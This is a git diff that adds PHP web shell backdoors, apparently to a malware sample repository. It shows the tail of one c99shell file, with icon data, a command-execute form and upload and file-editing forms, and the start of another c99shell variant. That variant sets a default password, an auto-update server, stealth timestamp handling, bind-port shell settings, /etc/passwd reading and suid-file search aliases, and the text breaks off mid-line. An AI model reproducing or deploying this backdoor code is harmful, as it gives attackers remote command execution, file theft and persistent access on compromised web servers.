+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .
    ";} +?> +
    + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + + + + +
    :: Search ::
      - regexp 

    :: Upload ::
     
    +
    :: Make Dir ::
     
    :: Make File ::
     
    +
    :: Go Dir ::
     
    :: Go File ::
     
    +

    --[ c99shell v. powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: ]--

    + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.e b/PHP/Backdoor.PHP.C99Shell.e new file mode 100644 index 00000000..865f24de --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.e @@ -0,0 +1,2782 @@ + +
    +
    +
    +
    +
    +
    +Password:
    + +
    +Host: ".$_SERVER["HTTP_HOST"]."
    +IP: ".gethostbyname($_SERVER["HTTP_HOST"])."
    +Your ip: ".$_SERVER["REMOTE_ADDR"]." +
    +");} + +} + +$shver = "1.0 beta (4.02.2005)"; //Current version +//CONFIGURATION +$surl = "?"; //link to this script, INCLUDE "?". +$rootdir = "./"; //e.g "c:", "/","/home" +$timelimit = 60; //limit of execution this script (seconds). + +//Authentication + +$login = false; //login +//DON'T FOGOT ABOUT CHANGE PASSWORD!!! +$pass = "team"; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) +//$login = false; //turn off authentication + +$autoupdate = true; //Automatic updating? + +$updatenow = false; //If true, update now + +$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server + +$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod + +$filestealth = 1; //if true, don't change modify&access-time + +$donated_html = ""; //If you publish free shell and you wish + //add link to your site or any other information, + //put here your html. +$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html. + +$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1") + +$curdir = "./"; //start directory + +$tmpdir = dirname(__FILE__); //Directory for tempory files + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext1","ext2","ext3",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"), + "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar") +); + +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "11457"; // default port for binding + +/* Command-aliases system */ +$aliases = array(); +$aliases[] = array("-----------------------------------------------------------", "ls -la"); +/* ????? ?? ??????? ???? ?????? ? suid ????? */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); +/* ????? ? ??????? ?????????? ???? ?????? ? suid ????? */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); +/* ????? ?? ??????? ???? ?????? ? 